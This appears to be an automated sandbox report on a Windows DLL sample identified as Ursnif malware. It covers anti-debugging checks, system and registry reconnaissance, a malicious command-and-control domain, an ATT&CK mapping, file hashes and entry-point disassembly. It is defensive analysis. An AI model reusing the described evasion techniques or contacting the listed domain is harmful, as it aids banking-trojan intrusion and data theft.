Code function: 0_2_0111B8F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_0111B8F0

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_010E1F7C LoadLibraryA,GetProcAddress,

0_2_010E1F7C

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01154F71 mov eax, dword ptr fs:[00000030h]	0_2_01154F71
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01154EA7 mov eax, dword ptr fs:[00000030h]	0_2_01154EA7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01154AAE push dword ptr fs:[00000030h]	0_2_01154AAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03154F71 mov eax, dword ptr fs:[00000030h]	4_2_03154F71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03154EA7 mov eax, dword ptr fs:[00000030h]	4_2_03154EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03154AAE push dword ptr fs:[00000030h]	4_2_03154AAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049E4F71 mov eax, dword ptr fs:[00000030h]	6_2_049E4F71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049E4AAE push dword ptr fs:[00000030h]	6_2_049E4AAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049E4EA7 mov eax, dword ptr fs:[00000030h]	6_2_049E4EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F84F71 mov eax, dword ptr fs:[00000030h]	7_2_02F84F71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F84AAE push dword ptr fs:[00000030h]	7_2_02F84AAE
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F84EA7 mov eax, dword ptr fs:[00000030h]	7_2_02F84EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F54F71 mov eax, dword ptr fs:[00000030h]	8_2_02F54F71
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F54EA7 mov eax, dword ptr fs:[00000030h]	8_2_02F54EA7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F54AAE push dword ptr fs:[00000030h]	8_2_02F54AAE

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_0111B900 GetProcessHeap,RtlAllocateHeap,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_init,__mtinit,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__mtterm,__heap_term,___setargv,__setenvp,__cinit,__ioterm,__mtterm,__heap_term,__CrtSetDbgFlag,__CrtDumpMemoryLeaks,__ioterm,__mtterm,__heap_term,___set_flsgetvalue,__encode_pointer,__initptd,GetCurrentThreadId,__freeptd,

0_2_0111B900

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0111C060 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0111C060
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0111B8F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0111B8F0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_0111DC70 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0111DC70
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_01120680 SetUnhandledExceptionFilter,__encode_pointer,	0_2_01120680
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_011206B0 __encode_pointer,SetUnhandledExceptionFilter,	0_2_011206B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0311C060 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0311C060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0311B8F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0311B8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_03120680 SetUnhandledExceptionFilter,__encode_pointer,	4_2_03120680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_031206B0 __encode_pointer,SetUnhandledExceptionFilter,	4_2_031206B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_0311DC70 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0311DC70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049ADC70 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_049ADC70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049B0680 SetUnhandledExceptionFilter,__encode_pointer,	6_2_049B0680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049B06B0 __encode_pointer,SetUnhandledExceptionFilter,	6_2_049B06B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049AB8F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_049AB8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 6_2_049AC060 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_049AC060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F4B8F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_02F4B8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F4C060 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_02F4C060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F506B0 __encode_pointer,SetUnhandledExceptionFilter,	7_2_02F506B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F50680 SetUnhandledExceptionFilter,__encode_pointer,	7_2_02F50680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_02F4DC70 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_02F4DC70
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F1B8F0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_02F1B8F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F1C060 _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_02F1C060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F206B0 __encode_pointer,SetUnhandledExceptionFilter,	8_2_02F206B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F20680 SetUnhandledExceptionFilter,__encode_pointer,	8_2_02F20680
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 8_2_02F1DC70 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_02F1DC70

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3d0.dll',#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.480485802.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.481732138.00000000037E0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.481214417.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.481514299.00000000034B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.481915733.0000000003400000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.480485802.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.481732138.00000000037E0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.481214417.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.481514299.00000000034B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.481915733.0000000003400000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.480485802.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.481732138.00000000037E0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.481214417.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.481514299.00000000034B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.481915733.0000000003400000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.480485802.0000000001BA0000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.481732138.00000000037E0000.00000002.00000001.sdmp, rundll32.exe, 00000006.00000002.481214417.0000000003560000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.481514299.00000000034B0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.481915733.0000000003400000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_011D4454 cpuid

0_2_011D4454

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	0_2_010E1E8A
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoA,	0_2_0112A8A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	4_2_030E1E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	4_2_0312A8A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	6_2_04971E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	6_2_049BA8A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	7_2_02F11E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	7_2_02F5A8A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	8_2_02EE1E8A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoA,	8_2_02F2A8A0

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_010E1144 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

0_2_010E1144

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_03294454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

7_2_03294454

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_010E1F10 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

0_2_010E1F10

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5312, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000004.00000003.471466961.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471539450.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.484867910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471563129.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471585703.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471598164.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471441604.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471514910.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.471488667.00000000059B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 5312, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation1	Path Interception	Process Injection12	Masquerading1	Input Capture1	System Time Discovery1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Query Registry1	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Security Software Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery34	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
3d0.dll	56%	Virustotal		Browse
3d0.dll	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
0.2.loaddll32.exe.11d0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
4.2.rundll32.exe.30e0000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
4.2.rundll32.exe.3080000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
7.2.rundll32.exe.3290000.2.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
0.2.loaddll32.exe.10e0000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
8.2.rundll32.exe.2d60000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File

Domains

Source	Detection	Scanner	Label	Link
authd.feronok.com	10%	Virustotal		Browse

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
authd.feronok.com	unknown	unknown	true	10%, Virustotal, Browse	unknown

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	446439
Start date:	09.07.2021
Start time:	16:06:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 30s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	3d0.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.troj.winDLL@18/5@3/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 15.7% (good quality ratio 15.1%) Quality average: 79.6% Quality standard deviation: 28.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): audiodg.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.42.151.234, 52.255.188.83, 168.61.161.212, 13.88.21.125, 95.100.54.203, 23.0.174.185, 23.0.174.200, 104.43.193.48, 104.43.139.144, 20.190.160.5, 20.190.160.7, 20.190.160.9, 20.190.160.130, 20.190.160.1, 20.190.160.133, 20.190.160.70, 20.190.160.74, 20.50.102.62, 2.18.105.186 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, www.tm.lg.prod.aadmsa.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e11290.dspg.akamaiedge.net, go.microsoft.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus16.cloudapp.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:08:59	API Interceptor	2x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A8A3996F-E10A-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	21592
Entropy (8bit):	1.7605308742054366
Encrypted:	false
SSDEEP:	48:Iw0GcprxGwpLFG/ap8RGIpcLZzGvnZpvLZrGo4qp9LZdGo4hpmLaYGWGWR:roZrZh2TWLatLbfLMhML7
MD5:	909BD268F7852C0E4A1CD0EC5330B996
SHA1:	03C6C9EBEE7BEB31FE6DB4B2B5681E2A4FD4396A
SHA-256:	C7B0B26E29061900B9EC009003742854DFC0F5CD0888C04449D9041B5E327B41
SHA-512:	21E7D613DF463DEE44BA1E06172A387401833737E0E88B27E0D4B824F227D3D9FD157F2963589E5482E49AB17D9EF55BF512B82C4D8791C260F32217EDD4E3E2
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A8A39971-E10A-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5734626457757865
Encrypted:	false
SSDEEP:	48:IwqGcprnGwpanG4pQHGrapbSaGQpBSGHHpcTTGUpG:rOZxQJ6bBSijp2tA
MD5:	5BF87CAC9DE6B9716F48D44798EBF4F3
SHA1:	AE81D526E52A9C4FF7E5242F24B9E027D5574322
SHA-256:	BA8A6A61ECAD3919418C5092ACC981729C4CEC27A5F18D4582CEA6E4AC36B767
SHA-512:	7A1550634BD132BBE996C7BC1D12ABFD3774E1C032327E83C66D446254C3C7BA53320EBBB64FB467FB1C8064F1A6D50F4CFCE8D2031B5500239F68467810E78B
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	2997
Entropy (8bit):	4.4885437940628465
Encrypted:	false
SSDEEP:	48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
MD5:	2DC61EB461DA1436F5D22BCE51425660
SHA1:	E1B79BCAB0F073868079D807FAEC669596DC46C1
SHA-256:	ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
SHA-512:	A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
Malicious:	false
Preview:	.<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can’t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can’t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..

C:\Users\user\AppData\Local\Temp\~DF629150E4B97AFAC5.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	25657
Entropy (8bit):	0.3137598701003095
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwt729lwtS9l2td:kBqoxKAuvScS+151T
MD5:	F8CDCB637A8820227F00CD66B0134799
SHA1:	A674F500673CBA7AEE21A83B0ACE6B6DB48FDE42
SHA-256:	0A84322FA5715C9D23074D5159F0C6517EBDEC4DDE57F251CA7FBD546082CFBF
SHA-512:	A2F1537F3AEB1DA4F2C4271DF21315D0CAAE0922F763FA835AFAA68A8FAB56E2EBD86A8FD9B5072A4533F3DC998BF6896C643AB5C643EE268C05D76A89CB339C
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFD2FE459C37A3F042.TMP Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12917
Entropy (8bit):	0.39848483000472396
Encrypted:	false
SSDEEP:	24:c9lLh9lLh9lIn9lIn9lo6F9loW9lWru5OFYL:kBqoIBHryM+
MD5:	BD74D4AC6481E9EEF6E8334DF3FEFD77
SHA1:	CACD0A5223D35D1DDF0248924F7DB33E254EFD18
SHA-256:	585F5629711A9596DEBB6355CE35412C5FFE16C97B105BBCEF7235C796E33EA3
SHA-512:	376943D168B058A8134F4061125A9F46051BBFB10D38CFC38DA0F17053D02928C7CAAD2B7E5AC2D4862A7473C71351A38E0F38D63696579D38211AAF7DDD0EA7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.556958108983917
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 98.32% Windows Screen Saver (13104/52) 1.29% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	3d0.dll
File size:	503809
MD5:	3d080af5324b49363773d0db21b620ed
SHA1:	2724f486e0f8607eda3ea9e9783ea4f46bc98342
SHA256:	c21498aea57a809c36258572bc551c6047a4bf93958bc7a3d4b46d844fc9f1b3
SHA512:	d68d25125dc209f16936b8baad4334f7bb6c4fa58207fafd5428cb1c98630d668da6253e010ac4bb4dedd1dd418f1f31e08acef689e5f663fbde28c7935fadc0
SSDEEP:	12288:BsYGY1GlobL6LRsn7l7tFG7vj1PpBsB0YBi7cY2ab51tB+:BsYG4dAGnZ7/GFPp4PYNb51tk
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........9...WH..WH..WH...H..WHM )H..WH."*H..WH.":HR.WH...H..WH..VHw.WH."9H..WH."-H..WH."+H..WH."/H..WHRich..WH.......................

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x103bc30
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:
Time Stamp:	0x466EF456 [Tue Jun 12 19:30:30 2007 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d0a22a500d7e527f20cf198a5d20bfd2

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007FD20CC24F47h
call 00007FD20CC2F2F7h
mov eax, dword ptr [ebp+10h]
push eax
mov ecx, dword ptr [ebp+0Ch]
push ecx
mov edx, dword ptr [ebp+08h]
push edx
call 00007FD20CC24F56h
add esp, 0Ch
pop ebp
retn 000Ch
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push FFFFFFFEh
push 01071140h
push 0103D5E0h
mov eax, dword ptr fs:[00000000h]
push eax
add esp, FFFFFFE8h
push ebx
push esi
push edi
mov eax, dword ptr [010731E0h]
xor dword ptr [ebp-08h], eax
xor eax, ebp
push eax
lea eax, dword ptr [ebp-10h]
mov dword ptr fs:[00000000h], eax
mov dword ptr [ebp-18h], esp
mov dword ptr [ebp-1Ch], 00000001h
cmp dword ptr [ebp+0Ch], 00000000h
jne 00007FD20CC24F52h
cmp dword ptr [01087FB8h], 00000000h
jne 00007FD20CC24F49h
xor eax, eax
jmp 00007FD20CC25093h
mov dword ptr [ebp-04h], 00000000h
